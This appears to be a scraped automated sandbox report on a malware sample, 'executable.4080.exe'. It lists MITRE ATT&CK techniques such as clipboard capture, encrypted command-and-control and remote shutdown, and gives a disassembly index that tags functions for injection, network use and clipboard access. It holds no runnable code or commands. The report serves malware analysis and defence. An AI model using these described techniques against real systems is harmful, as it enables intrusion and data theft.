Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report executable.4080.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: executable.4080.exe PID: 5424 Parent PID: 5524

General

Chronological Activities

Disassembly

Function 0040779B, Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 111
memorynetworkCOMMON

Function 0040DB47, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 56
COMMON

Function 00407F7F, Relevance: 47.5, APIs: 25, Strings: 2, Instructions: 276
sleepsynchronizationCOMMON

Function 0040E8FE, Relevance: 10.6, APIs: 7, Instructions: 64
COMMON

Function 00411408, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 393
libraryloaderwindowCOMMON

Function 00405841, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 121
memoryCOMMON

Function 00408C33, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 180
libraryloaderCOMMON

Function 0040540A, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146
memoryCOMMON

Function 00412AC1, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97
windowCOMMON

Function 0040F61D, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90
libraryloaderprocessCOMMON

Function 0040B4D8, Relevance: 10.6, APIs: 7, Instructions: 109
sleepfilesynchronizationCOMMON

Function 0040AC31, Relevance: 10.6, APIs: 7, Instructions: 78
filememorysynchronizationCOMMON

Function 0040F3C3, Relevance: 10.6, APIs: 7, Instructions: 52
threadCOMMON

Function 004034F6, Relevance: 9.1, APIs: 6, Instructions: 81
threadnativeinjectionCOMMON

Function 00411A9D, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189
COMMON

Function 0041280F, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 90
timeCOMMON

Function 00412C03, Relevance: 7.6, APIs: 5, Instructions: 71
clipboardCOMMON

Function 0040B41D, Relevance: 7.6, APIs: 5, Instructions: 61
fileCOMMON

Function 0040F02D, Relevance: 6.1, APIs: 4, Instructions: 96
memoryinjectionCOMMON

Function 0040F36F, Relevance: 6.0, APIs: 4, Instructions: 36
threadprocessCOMMON

Function 00415300, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29
shutdownCOMMON

Function 00404ACF, Relevance: 4.6, APIs: 3, Instructions: 61
injectionCOMMON

Function 0040344C, Relevance: 4.6, APIs: 3, Instructions: 59
nativethreadCOMMON

Function 0040F810, Relevance: 3.0, APIs: 2, Instructions: 35
COMMON

Function 0041000E, Relevance: 1.5, APIs: 1, Instructions: 41
comCOMMON

Function 00409921, Relevance: 1.5, APIs: 1, Instructions: 21
timeCOMMON

Function 00404CCE, Relevance: 1.3, Strings: 1, Instructions: 48
COMMON

Function 0040C570, Relevance: .2, Instructions: 190
COMMONCrypto

Function 0040B65A, Relevance: .1, Instructions: 72
COMMONCrypto

Function 004073D9, Relevance: 35.1, APIs: 9, Strings: 11, Instructions: 82
libraryloaderCOMMON

Function 00404F4A, Relevance: 28.2, APIs: 4, Strings: 12, Instructions: 205
COMMON

Function 00404846, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 176
networkCOMMON

Function 00405B9D, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 148
memoryCOMMON

Function 004059F8, Relevance: 24.6, APIs: 4, Strings: 10, Instructions: 118
COMMON

Function 0040618E, Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 156
registrymemoryCOMMON

Function 0040851A, Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 84
libraryloaderCOMMON

Function 00406FCD, Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 198
COMMON

Function 0040643F, Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 158
registrymemoryCOMMON

Function 0040E223, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Function 00405E5C, Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 197
COMMON

Function 00413618, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148
COMMON

Function 00414C47, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 252
COMMON

Function 00406929, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 140
registrymemoryCOMMON

Function 00408E58, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 101
sleepCOMMON